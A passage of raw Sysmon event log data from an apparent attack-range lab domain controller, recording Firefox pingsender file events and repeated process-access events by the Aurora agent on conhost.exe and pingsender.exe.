Files\Mozilla Firefox\pingsender.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\saved-telemetry-pings\9259c708-c135-4676-9fa5-ac1d38bfad68MD5=C61A0863D798AED589437107C497AC83,SHA256=D1724414377A4D85D754BE0BD7BF6A39A8310D10E539699696150CF0A95FA1D2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043232Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.728{FE4C2B44-E49E-63C7-3F06-00000000AF02}3596ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\pingsender.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\saved-telemetry-pings\210953fe-f940-4544-9df2-fdc6d8f261ddMD5=DFF32E8A4FBB606CA2633A96DE04A55B,SHA256=A0B3AE3041CDDB9D9906E9345C6E4FE715CF281F634A13C022584F6B1C050D03,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043231Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.718{FE4C2B44-E49E-63C7-4306-00000000AF02}5300ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\pingsender.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\saved-telemetry-pings\a6bcb75e-9886-499a-9eec-f1d6ca059c7aMD5=4FDE06BF1EFA678D718D7DF657AA90C4,SHA256=2C825664731DEB0A66AC239C9141E3436A102D03A15E76D2D5F4C2E575825F2D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043230Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.708{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4606-00000000AF02}1512C:\Windows\system32\conhost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043229Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.708{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4606-00000000AF02}1512C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043228Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.708{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4606-00000000AF02}1512C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043227Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.708{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4606-00000000AF02}1512C:\Windows\system32\conhost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043226Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.707{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4606-00000000AF02}1512C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043225Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.707{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4606-00000000AF02}1512C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043224Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.698{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4506-00000000AF02}6948C:\Program Files\Mozilla Firefox\pingsender.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043223Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.698{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4506-00000000AF02}6948C:\Program Files\Mozilla Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043222Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.697{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4506-00000000AF02}6948C:\Program Files\Mozilla Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043221Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.697{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4506-00000000AF02}6948C:\Program Files\Mozilla Firefox\pingsender.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043220Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.697{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4506-00000000AF02}6948C:\Program Files\Mozilla Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043219Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.697{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4506-00000000AF02}6948C:\Program Files\Mozilla Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043218Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.667{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4406-00000000AF02}2636C:\Windows\system32\conhost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043217Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.667{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4406-00000000AF02}2636C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043216Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.667{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4406-00000000AF02}2636C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043215Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.666{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4406-00000000AF02}2636C:\Windows\system32\conhost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043214Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.666{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4406-00000000AF02}2636C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043213Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.666{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4406-00000000AF02}2636C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043212Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.658{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4306-00000000AF02}5300C:\Program Files\Mozilla Firefox\pingsender.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043211Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.658{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4306-00000000AF02}5300C:\Program Files\Mozilla Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043210Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.657{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4306-00000000AF02}5300C:\Program Files\Mozilla Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043209Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.651{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4206-00000000AF02}3916C:\Windows\system32\conhost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043208Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.651{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4206-00000000AF02}3916C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043207Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.651{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4206-00000000AF02}3916C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043206Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.643{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4106-00000000AF02}6820C:\Program Files\Mozilla Firefox\pingsender.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043205Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.643{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4106-00000000AF02}6820C:\Program Files\Mozilla Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043204Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.643{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4106-00000000AF02}6820C:\Program Files\Mozilla Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043203Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.642{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4106-00000000AF02}6820C:\Program Files\Mozilla Firefox\pingsender.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043202Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.642{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4106-00000000AF02}6820C:\Program Files\Mozilla Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043201Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.642{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4106-00000000AF02}6820C:\Program Files\Mozilla 